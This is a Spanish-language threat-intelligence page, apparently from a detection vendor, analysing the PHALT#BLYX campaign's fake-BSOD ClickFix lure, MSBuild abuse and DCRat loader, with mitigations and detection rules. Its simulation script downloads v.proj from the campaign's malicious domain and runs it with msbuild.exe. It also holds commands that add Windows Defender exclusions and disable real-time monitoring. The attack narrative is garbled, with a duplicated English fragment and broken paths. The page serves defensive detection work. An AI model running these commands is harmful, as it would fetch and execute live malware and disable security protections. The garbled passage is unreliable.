Análisis de PHALT#BLYX: Falsos BSODs y Herramientas de Construcción Confiables en Cadenas de Malware
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
El informe detalla una cadena de intrusión de varias etapas que afecta al sector hotelero que combina una página de destino falsa de Booking.com, una animación engañosa similar a una pantalla azul y un mensaje estilo ClickFix para persuadir a los usuarios a ejecutar un dropper de PowerShell. Ese dropper recupera un archivo de proyecto MSBuild, que ejecuta un cargador DCRat personalizado. El cargador altera Windows Defender, establece persistencia utilizando un acceso directo de inicio .url e inyecta su carga útil en procesos legítimos. Al apoyarse en utilidades de life-off-the-land como PowerShell y MSBuild.exe, los operadores reducen las huellas evidentes de malware. También se observan artefactos en ruso en la cadena como una pista de atribución.
Investigación
Los investigadores de Securonix mapearon el flujo desde correos electrónicos de phishing que ofrecen enlaces de ‘cancelación de reservación’ hacia un dominio malicioso, luego hacia un comando de línea de PowerShell que localiza msbuild.exe, descarga un archivo v.proj y lo ejecuta. El proyecto v.proj realiza múltiples acciones: agrega exclusiones a Windows Defender, descarga staxs.exe (una variante de DCRat), crea un acceso directo de inicio .url para persistencia y se conecta a la infraestructura de comando y control por el puerto 3535. El cargador luego comprime e inyecta la etapa final en aspnet_compiler.exe, usando hollowing de proceso para mezclarse con actividad legítima.
Mitigación
Reduzca la exposición entrenando a los usuarios para reconocer mensajes estilo ClickFix y la ingeniería social de «ejecuta este comando para solucionar». Monitoree y restrinja la ejecución de MSBuild.exe, especialmente cuando se invoque desde rutas inusuales o flujos de trabajo dirigidos por el usuario, y habilite el registro de bloque de script de PowerShell para una mejor visibilidad. Añada detecciones para la creación de accesos directos .url en la carpeta de Inicio y para las modificaciones a las exclusiones de Windows Defender. En la capa de red, bloquee el tráfico saliente a los dominios maliciosos identificados y restrinja explícitamente o alerte sobre salidas sospechosas al TCP/3535 donde no sea requerido.
Respuesta
Si se detecta actividad, aísle el host y preserve los artefactos clave incluyendo v.proj, staxs.exe y cualquier archivo de acceso directo .url de Inicio. Elimine exclusiones no autorizadas de Defender, termine procesos maliciosos o inyectados, y bloquee los dominios/IPs asociados de C2, especialmente cualquier comunicación a través del puerto 3535. Restablezca credenciales potencialmente expuestas, ejecute un escaneo completo de malware y examine el entorno para patrones similares de ejecución de MSBuild y comandos de PowerShell. Finalmente, despliegue detecciones informadas por inteligencia de amenazas que se centren en el abuso de MSBuild, el comportamiento de ClickFix y la persistencia mediante accesos directos de Inicio para prevenir recurrencias.
Flujo de Ataque
Detecciones
Descargar o Cargar a través de Powershell (via cmdline)
Ver
Cambios Sospechosos de Preferencias de Windows Defender (a través de powershell)
Ver
Puntos de Posible Persistencia [ASEPs – Software / Colmena NTUSER] (a través de registry_event)
Ver
Binarios / Scripts Sospechosos en Ubicación de Autoinicio (a través de file_event)
Ver
IOCs (HashSha512) para detectar: Analizando PHALT#BLYX: Cómo se Usan Falsos BSODs y Herramientas de Construcción Confiables para Construir una Infección de Malware
Ver
IOCs (SourceIP) para detectar: Analizando PHALT#BLYX: Cómo se Usan Falsos BSODs y Herramientas de Construcción Confiables para Construir una Infección de Malware
Ver
IOCs (HashSha256) para detectar: Analizando PHALT#BLYX: Cómo se Usan Falsos BSODs y Herramientas de Construcción Confiables para Construir una Infección de Malware
Ver
IOCs (DestinationIP) para detectar: Analizando PHALT#BLYX: Cómo se Usan Falsos BSODs y Herramientas de Construcción Confiables para Construir una Infección de Malware
Ver
Ejecución de Carga Maliciosa PHALT#BLYX a través de MSBuild y Process Hollowing [Creación de Procesos de Windows]
Ver
Campaña de Malware PHALT#BLYX Usando PowerShell y MSBuild para Infección [Powershell de Windows]
Ver
Ejecución de Simulación
Prerrequisito: La Verificación Previa del Vuelo de Telemetría y Línea Base debe haber sido pasada.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa reflejan directamente los TTPs identificados y apuntan a generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa de Ataque y Comandos:
El actor de amenaza abre una sesión de PowerShell en un punto final comprometido. Primero localizan elbinario msbuild.exe, luego descargan un proyecto MSBuild malicioso (binary, then download a malicious MSBuild project (v.proj) aC:ProgramData. El atacante invoca inmediatamentebinario msbuild.exe, luego descargan un proyecto MSBuild malicioso (para ejecutar la carga útil, que deja caer una segunda etapa. Finalmente, alteran Windows Defender agregando exclusiones y deshabilitando la monitorización en tiempo real para asegurar la persistencia. -
Script de Prueba de Regresión:
# Script de simulación PHALT#BLYX – reproduce la actividad que dispara la detección # -------------------------------------------------------------- # 1. Localiza msbuild.exe $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName # 2. Descarga proyecto MSBuild malicioso a ProgramData $projUrl = "https://2fa-bns.com/v.proj" $dest = "$env:ProgramDatav.proj" Invoke-WebRequest -Uri $projUrl -OutFile $dest # 3. Ejecuta el proyecto con msbuild.exe & $msb $dest # 4. Modifica configuraciones de Windows Defender (cualquiera de las siguientes satisfará la regla) # Descomente las líneas deseadas para simular las acciones del atacante. # Añadir ruta de exclusión # Add-MpPreference -ExclusionPath "$env:ProgramData" # Añadir exclusión para archivos .exe # Add-MpPreference -ExclusionExtension ".exe" # Añadir exclusión para archivos .ps1 # Add-MpPreference -ExclusionExtension ".ps1" # Desactiva monitorización en tiempo real # Set-MpPreference -DisableRealtimeMonitoring $true -
Comandos de Limpieza:
# Elimina el archivo de proyecto dejado caer Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue # Restaura la monitorización en tiempo real de Windows Defender (si fue desactivada) Set-MpPreference -DisableRealtimeMonitoring $false # Elimina cualquier exclusión añadida (ejemplo para exclusión de ruta) Remove-MpPreference -ExclusionPath "$env:ProgramData" # Opcionalmente elimina cualquier archivo restante creado por la carga # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue